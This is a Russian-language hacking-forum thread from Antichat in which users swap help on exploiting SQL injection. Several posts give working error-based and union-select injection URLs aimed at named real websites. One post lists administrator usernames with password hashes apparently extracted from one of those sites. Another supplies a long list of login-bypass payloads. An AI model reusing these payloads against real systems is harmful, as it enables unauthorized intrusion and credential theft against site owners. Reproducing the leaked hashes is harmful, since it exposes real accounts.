Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Права чего, права кого, права куда? )

    В селект запросе на мускуле это сделать невозможно (а булки стоят на мускуле)

    В апдейт запросе не нужны никакие "права", если скрипт что-то апдейтит, то права у него есть, разумеется

    НО Скрипт должен апдейтить в базу юзеов булки, что-бы была возможность изменить там что-то + скуль должна быть довольно специфической что-бы удалось сменить хеш. Скрипты самой булки таких багов не имеют, сомневаюсь что есть какие то модули, которые имеют такие баги.
    Тоесть должен быть какой-то кривой самописный скрипт, работающий с таблицей юзеров, и имеющий скуль в апдейте + куча условий, что невероятно, или скрипт имеющий скуль в апдейте в tbl_name, что ещё менее вероятно.

    Тоесть ответ - нет, с вероятностью 99.99%
     
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Про селект ты сам придумал. В вопросе такого не было.

    KolosJey, а в инсерте?
     
  3. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Ровно тоже самое что и в апдейте. Так что врядли )
     
    1 person likes this.
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    большинство людей под SQL injection подразумевают SQLi именно в select запросе, чтобы не заблуждать человека задающего вопрос нужно было добавить что данный способ работает только в апдейт запросах
     
    _________________________
  5. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345

    как такое крутить? дальше and 1=2, не ушел... :(
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    https://forum.antichat.ru/threadedpost1826253.html

    не ибейс , но синтаксис похож..почитай..может пригодится
     
  7. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    order by чета не работает ((( вроде же айбэйс, ошибки характерные присутствуют
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    хелп, чёт никак не могу разкрутить
    PHP:
    http://titancup.ru/user/?id=11+union+select+1--+
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://titancup.ru/user/?id=11+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    стандартный метод не пробовал, но error based катит
     
    _________________________
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,concat%28%28select+user%28%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--1
    

    upd: Konqi опередил)
     
    1 person likes this.
  11. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    ts_manager_users
    Daven:b7838c7f83d8197f3e46b5d88e3d5a6c
    White:0d9198487f4ad5fb4407ee44b84df42c
    demiurg:c16bb5217e34563e2eb9af2d9edabb6c

    помойму админы


    бле
    опередили
     
  12. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Приветствую.
    В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12

    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88

    Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100

    Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101



    Это является sql иньекцией? И можно что-то с этим сделать?
     
  13. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Пробуй обойти авторизацию так:
    admin' --
    admin' #
    admin'/*
    ' or ''='
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    0 or 1=1
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 1=1--
    " or 1=1--
    ' or '1'='1'--
    "' or 1 --'"
    or 1=1--
    or%201=1
    or%201=1 --
    ' or 1=1 or ''='
    " or 1=1 or ""="
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi') or ('a'='a
    hi") or ("a"="a
    'hi' or 'x'='x';
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1--
    ' or username like '%
    ' or uname like '%
    ' or userid like '%
    ' or uid like '%
    ' or user like '%
    ' or 1=1 or ''='
    ' or ''='
    x' or 1=1 or 'x'='y
     
  14. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Есть такой кусок кода
    PHP:
        // Check IP From IP Logging Database
        
    $get_voted_aids $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_ip = '".get_ipaddress()."' $log_expiry_sql");
    в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: < > & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ? :(
     
  15. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Уважаемые гуру,

    Есть код, где _GET, _POST и _COOKIE "фильтруются" так:

    PHP:
    $_POST security($_POST);

    $_GET security($_GET);

    $_COOKIE security($_COOKIE);

    Функция сукурити:

    PHP:
    function security($value
        {
            if (
    is_array($value)) {
                
    $value array_map('security'$value);
            }else{
                if(!
    get_magic_quotes_gpc()) {
                    
    $value htmlspecialchars($valueENT_QUOTES'UTF-8');
                }else{
                    
    $value htmlspecialchars(stripslashes($value), ENT_QUOTES'UTF-8');
                }
                  
    $value str_replace("\\""\\\\"$value);
            }
            return 
    $value;
        }
    htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?
    Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?
     
    #18775 ne0k, 27 Dec 2011
    Last edited: 27 Dec 2011
  16. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого
    PHP:
    $get "SELECT * FROM `test` WHERE `id`= $id";
    Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях.
    По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя :(
     
  17. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Sql-inj такого типа раскучиваются или они не поддаются?

    _http://www.afr.ru/region/303'/ob/
     
  18. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Скобки юзай:
    http://www.afr.ru/region/(303)and(1)=(0) false
    http://www.afr.ru/region/(303)and(1)=(1) true
     
  19. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Это я тоже знаю.

    и, дальше как?
     
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://www.afr.ru/region/(303)and(1)=(1)union(select(1),2,3)#
    и т.д.
     
Thread Status:
Not open for further replies.